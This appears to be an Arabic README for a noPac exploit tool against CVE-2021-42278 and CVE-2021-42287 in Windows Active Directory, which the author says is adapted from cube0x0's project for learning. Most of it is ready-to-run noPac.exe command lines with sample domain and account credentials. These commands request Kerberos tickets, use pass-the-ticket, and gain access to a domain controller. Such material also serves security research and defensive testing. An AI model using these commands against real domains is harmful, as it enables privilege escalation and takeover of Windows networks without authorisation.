
CVE-2021-42287/CVE-2021-42278 مستغل
يعود أصل هذا المشروع إلى تعلم مبادئ noPac، وقد تم إجراء بعض التعديلات على أساس مشروع cube0x0. تم إضافة تعليقات توضيحية شخصية في الكود المصدر.
يمكن الاطلاع على مقالة تحليل الثغرة في مدونتي: تحليل noPac
noPac هو استغلال مشترك لثغرتين: CVE-2021-42278 (انتحال sAMAccountName) و CVE-2021-42287 (خداع KDC)، ولا يمكن الاستغلال بنجاح إلا إذا تم استيفاء شروط كلتا الثغرتين في نفس الوقت.
أمثلة: الحصول على TGT و ST
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs
أمثلة: PTT
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
الطريقة الأكثر شيوعاً هي PTT:
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
قبل استخدام noPac، لا توجد صلاحية الوصول إلى DC.

استخدام noPac.
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

بعد PTT، يمكن الوصول بنجاح إلى DC مرة أخرى من النافذة الحالية.

لاحظ أن البرنامج يعمل فقط على الأجهزة المزودة ببيئة .NET 4.0+، حيث يأتي Windows Server 2012 افتراضياً مع .NET 4.0، ويأتي Windows Server 2008 افتراضياً مع .NET 3.5.
لعرض إصدار .NET الموجود على الجهاز:
dir c:\Windows\Microsoft.NET\Framework64
